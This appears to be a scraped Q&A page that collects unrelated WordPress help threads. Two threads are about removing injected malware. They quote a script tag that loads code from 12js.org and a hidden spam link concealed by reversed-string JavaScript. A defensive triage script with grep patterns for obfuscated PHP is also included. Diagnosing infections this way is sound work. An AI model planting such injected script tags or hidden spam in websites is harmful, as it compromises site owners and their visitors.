How to Remove Malicious Code from WordPress Website? - wordpress

I created my website by myself. Recently, I found that malicious code is appearing in my website as
<script type="text/javascript" src="http://12js.org/jquery.js">
Sometimes this code appears in the source code; at other times it disappears. It is like a re-infection.
I cannot find this code and I need to solve this issue. Can anyone here help me?
I am suffering with this problem.

You need to search your theme and plugin code files.
Look for the below code WP function malicious code

Related

WordPress uses backed-up theme files instead of customized file. (solved by myself // little how-to)

I just wrote a long and detailed question and when I was about to submit it, I fixed the problem by myself. The problem did cost me about 5 hours and now I will just post this little explanation, so maybe it helps others and they will not feel as stupid as I do right now.
In my defense: I do not have that much experience with this system.
What was the Problem? When did it show up?
Before I change a file on the server, I always duplicate it and change the file name to originalFileName_yyyymmdd_hhmm.php (filename + date + time). I want to keep track of the changes, and when we launch the website, I wanted to do a local backup and then delete them from the server.
Let's say, in the folder of the active theme there is a file called home.php.
It is a template file, which means that you can select it as a template for a page when editing it in the backend of WordPress.
I duplicated it and called the new file home_20180301_2300.php.
Then I edited the home.php, but the changes were not displayed on the website.
I checked for any known cache issue, but that was not the problem. So I installed a debugging plugin (Template Debugger) to see which files are used by the server to create the website.
WordPress used the home_20180301_2300.php instead of the home.php and I did not know why. When I deleted home_20180301_2300.php WordPress did NOT use home.php. It just took the standard template instead.
What I think happened
In the last moment before submitting this question I realized what happened:
In the process of working, there was a situation where I deleted the home.php and then edited the page in the backend. WordPress could not find the home.php, which was set as the template for this page. BUT it found home_20180301_2300.php and used it. (Because WordPress is smart [sometimes {not a joke}]). When home.php was back in its place, WordPress did not care. It looks like as long as there is no problem, WordPress does not search for other (or newer, or better suiting) files. It still used home_20180301_2300.php, because it worked. That's why my changes in home.php did not have any effect. home.php was ignored.
The Solution
I had to delete home_20180301_2300.php, open the page in edit mode and select home.php as the template again. WordPress did not find home_20180301_2300.php, "BUT HEY! There is home.php, my old friend, so I can use it", WordPress said and they happily lived together for the rest of their time.
Feel free to comment!
I am sure my explanation is quite simple and not showing the whole picture. If anyone knows better, I would be glad to hear it. Better knowledge of the problem and the way WordPress works can help me and others to better understand future issues.
Peace out,
Nils

WordPress Facebook share - og:image blank

I tried everything but I can't find the problem.
I have this site http://www.ilsanoquotidiano.com and if I try to share a news item to Facebook, the og:image is always blank, but up to a month ago this worked fine.
I tried with plugins and manually, but the og:image is always blank, even in the Facebook debugger, although the raw tag is correct.
Could anyone help me?
Thanks
You can scrape the Facebook sharing information via the debugger. The link to check the result is given below:
https://developers.facebook.com/tools/debug/sharing/?q=http%3A%2F%2Fwww.ilsanoquotidiano.com%2F
Thanks for the reply. Reading online, I found that the problem could be the Jetpack version update. I tried deactivating the plugin and after a few hours everything worked fine. I can't figure out why this happened.

How to locate the malicious code in my WordPress site

It only came to my attention today that a malicious link was injected into my WordPress site.
The link is only on the homepage of orphicpixel.com, and here is the full code in HTML:
<div class="toggle-search"><div id="5221f63">Learn how to extend your penis size using vigrx reviews.</div><script type="text/javascript">document.getElementById("36f1225".split("").reverse().join("")).style.display = "none"</script><i class="fa fa-search"></i></div>
These are the fixes that I tried.
Change the theme to default - the code is still there.
Turn off all the plugins - the code is gone.
I have identified 5 plugins that, when turned on, make the code appear. But the plugins are official plugins like Jetpack, WP-pagination etc.
I already searched my database but found nothing.
I downloaded the theme files and searched the code: nothing.
I downloaded all the plugin files and searched the code: nothing.
So my last resort is to post this question here.
Unfortunately it is likely hidden in something like an eval statement, which can be hidden in hex. WordPress can be useful but the plugins are what make it a security nightmare. It is likely that some plugin has allowed some kind of upload access to your site and they can run their own PHP script or anything really.
Look through your files using
find . -type f -mtime -1
The -1 is days back, you can try -2, -3 etc. If this is a recent problem hopefully this will show a recently modified file. It will look a lot like gibberish when you open a file that is bad.
Again, unfortunately, if they are smart they will adjust the time on the file to be something a few weeks back or whatever, thus making the file much harder to find.
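The checks described in this answer, written out as a small shell script. This is an added example, not part of the original answer: it extends the `find -mtime` search with a ctime comparison that still surfaces files whose modification time was set back, a grep for eval-of-decoded-data and long hex-escape runs in PHP files, and a listing of PHP files in the upload directory. The function names are made up for illustration, and `wp-content/uploads` is assumed to be the upload directory (the WordPress default).

```shell
#!/bin/sh
# Added example (not from the thread): triage helpers for a WordPress tree.
# All function names are illustrative.

# Files whose inode change time (ctime) falls within the last DAYS days.
# touch can set mtime back, but ctime is reset to "now" whenever it does.
recent_ctime() {    # usage: recent_ctime DIR DAYS
    find "$1" -type f -ctime "-$2"
}

# Recent ctime but old mtime: the timestamp may have been set back.
# chmod, chown and restores from an archive cause the same mismatch,
# so treat hits as leads to inspect, not as proof.
backdated() {       # usage: backdated DIR DAYS
    find "$1" -type f -ctime "-$2" ! -mtime "-$2"
}

# PHP files that eval decoded data or carry long runs of \xNN escapes,
# the "gibberish" look of an obfuscated payload.
obfuscated_php() {  # usage: obfuscated_php DIR
    find "$1" -type f -name '*.php' -exec grep -lE \
        -e '(eval|assert)[[:space:]]*\(.*(base64_decode|gzinflate|str_rot13)' \
        -e '(\\x[0-9a-fA-F]{2}){8,}' {} + || true   # grep exits 1 on no match
}

# PHP files under the upload directory, which normally holds media, not code.
php_in_uploads() {  # usage: php_in_uploads WP_ROOT
    [ -d "$1/wp-content/uploads" ] || return 0
    find "$1/wp-content/uploads" -type f -name '*.php'
}

# Run all four checks when called as: sh triage.sh WP_ROOT [DAYS]
if [ "$#" -ge 1 ]; then
    days=${2:-3}
    echo "== changed (ctime) in last $days days ==";  recent_ctime "$1" "$days"
    echo "== possibly backdated ==";                  backdated "$1" "$days"
    echo "== obfuscated PHP ==";                      obfuscated_php "$1"
    echo "== PHP in uploads ==";                      php_in_uploads "$1"
fi
```

Some legitimate plugins use `eval` or place an `index.php` in the upload directory, so compare each hit against a clean copy of the same plugin or theme version before deleting anything.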
Did you purchase your WordPress theme yourself and from the original provider? I would download Theme Authenticity Checker and run the plugin -- it finds malicious code within the theme. I know you checked the theme files, but better be safe than sorry. Usually, purchased themes have no problem but downloaded ones often have malicious code such as this.

Change source in frame from an external link

Okay Internet, got a doozy here.
Let me try to explain this the best I can.
I have a website, and on one of its pages it has an iframe.
The link to this website is www.mywebsite.com/content.html
Here's what I need to do:
I need to create a link to www.mywebsite.com/content.html but change the source inside the iframe. I've read some things on Stack Overflow but they didn't help explain what I need to do.
Help?

What could possibly cause a 404 error when the apparent url is correct in WordPress?

I have one page that returns a 404 error and it is just mind boggling why this is happening. Please see this page: http://www.cra63.com/eventos/
It's the first link, 50 Aniversario 2013.
All other links work. But, not this one. Crazy. Is it a cache issue of some sort? I don't have a cache plugin installed, so I can't think of anything else.
When in the admin panel, the preview button loads the proper page with no problem. I have looked at the url 50 times and it seems to be correct.
Permalinks is set to /%post-name%/.
I'm not a novice although this apparently silly question makes me feel like I am.
Please help. Thanks!
Please duplicate page plus update URL accordingly (after you rename it).
You may enable WP_DEBUG - visit this codex article
One more idea, consider integrating an optimization plugin and run it often. A broken link checker is powerful too.
Ya neva know what the problem can be! Hopefully, it doesn't happen again...
NOTE - This was resolved by simply renaming the permalink from:
50-aniversario-2013
to ...
50th-aniversario-2013
When using a different name, aniversario-2013, it wasn't fixed. So, all I can suggest is to rename the url/permalink. But, this is definitely not a fix in my book. Call it a bug!
